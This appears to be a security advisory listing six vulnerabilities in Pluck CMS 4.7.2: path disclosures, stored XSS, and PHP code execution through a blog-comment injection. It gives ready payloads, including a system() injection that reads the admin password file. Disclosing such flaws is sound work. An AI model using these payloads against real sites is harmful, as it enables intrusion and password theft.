Pluck CMS:			http://www.pluck-cms.org/
Version:			4.7.2
By Ross Marks: 		http://www.rossmarks.co.uk
OSVDB Creditee:		http://osvdb.org/creditees/13991-ross-marks

1. Full Path Disclosure
	change session "PHPSESSID" to an array then refresh the page for:
		Notice: Array to string conversion in /var/www/website/public_html/pluck/login.php on line 19

2. Full Path Disclosure
	add non-alphanumeric chars to "PHPSESSID" to get:
		Warning: session_start(): The session id is too long or contains illegal characters,
		valid characters are a-z, A-Z, 0-9 and '-,' in /var/www/website/public_html/pluck/login.php on line 19

3. Full Path Disclosure
	change ?image var to array i.e.
		http://website.com/pluck/data/modules/albums/albums_getimage.php?image[]=test
	result:
	Warning: strpos() expects parameter 1 to be string, array given in /path/to/pluck/data/modules/albums/albums_getimage.php on line 19
	Warning: strpos() expects parameter 1 to be string, array given in /path/to/pluck/data/modules/albums/albums_getimage.php on line 28
	Warning: preg_match() expects parameter 2 to be string, array given in /path/to/pluck/data/modules/albums/albums_getimage.php on line 29
	Notice: Array to string conversion in /path/to/pluck/data/modules/albums/albums_getimage.php on line 39

4. Full Path disclosure
	$image should be a path so convert to string i.e.
		http://website.com/pluck/data/modules/albums/albums_getimage.php?image=test%00test
	result: 
	Warning: file_exists() expects parameter 1 to be a valid path, string given in /path/to/pluck/data/modules/albums/albums_getimage.php on line 39
	
5. stored XSS (requires access)
		use the "edit HTNL source" option from TinyMCE to write javascript directly i.e.
			<script>alert(1);</script>
		
6. PHP Code Execution (add slashes active)
		use blog comment with test data and a comment of:
			ls -la &\';system($reaction_message);//
		another example (to read unsalted MD5 password - refresh page and it'll be in source)
			cat data/settings/pass.php &\';system($reaction_message);//